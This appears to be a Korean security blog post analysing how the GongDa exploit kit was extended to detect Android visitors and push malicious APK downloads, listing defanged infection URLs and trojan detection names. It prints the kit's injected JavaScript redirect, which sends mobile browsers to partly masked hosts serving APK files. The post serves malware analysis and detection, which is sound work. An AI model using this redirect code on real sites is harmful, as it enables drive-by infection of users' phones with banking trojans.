공다팩(GongDa Exploit Kit), PC(EXE) 악성코드도 모자라 안드로이드(APK)까지 다운로드 시도



Malware Exploit Script로 유명한 공다팩(GongDa Exploit Kit, Dadong)에서 Java, SWF, IE 취약점 이외에
안드로이드 어플리케이션인 APK 파일 까지 다운로드를 시도하는 것이 포착되었다


아직까지 PC에서만큼 DBD(Drive-By-Download)가 자동으로 실행되진 않지만, 접속한 사용자의 OS Agent를 확인하여
모바일이면 APK 스크립트가 동작하여 다운로드까지는 가능할 수 있도록 코드가 추가되었다.


현재 확인 된 URL은 총 3개이다.

hxxp://naver.ejeongmin.com/kim/index.html

hxxp://naver.tendersmile.kr/kr/index.html

hxxp://www.toronsil.com/flash/cao/index.html


아래의 그림은 실제 Gongda Exploit Kit 에서 apk 다운로드가 추가 된 소스코드 내용이다.





위 코드에 삽입 된 "안드로이드 추가 다운로드" 코드는 아래와 같다.

function is_pc(){

    var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS");  // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속

var info = navigator.userAgent;

var len = os.length;

    for (var i = 0; i < len; i++) {

        if (info.indexOf(os[i]) > 0){

if (info.indexOf("Android") > 0){

return false; 

}

}

    }

    return true;

}


if(!is_pc())

{

document.location.href = "http://www.****.or.kr/unsa.apk";

}




function is_pc(){

    var os = new Array("Android","iPhone","Windows Phone","iPod","BlackBerry","MeeGo","SymbianOS");  // 페儉잚謹돨盧땡꾸鱗溝固잚謹,菱契警속

var info = navigator.userAgent;

var len = os.length;

    for (var i = 0; i < len; i++) {

        if (info.indexOf(os[i]) > 0){

if (info.indexOf("Android") > 0){

return false; 

}

}

    }

    return true;

}


if(!is_pc())

{

document.location.href = "http://61.38.***.***:8080/mbn.apk";

}



※ 해당 코드들은 http://www.oschina.net/code/snippet_734122_19107 사이트에서 소개 하듯이 클라이언트가
PC인지 모바일인지 식별하는 코드를 조금 수정한 코드이다.
 



그리고 악성으로 테스트 하기에는 좀 그래서;;;

해당 코드를 이용하여 테스트랩을 구성하였더니, 모바일 단말기에 다운로드가 되는 것을 확인하였다.


또한 다운로드 된 안드로이드 어플리케이션 파일(APK)은 알약 안드로이드에서도 탐지가 가능하다.


※ 알약 안드로이드 탐지명 : Trojan.Android.SMS.Stech.Gen, Trojan.Android.KRBanker
 

 



댓글(10)

Designed by JB FACTORY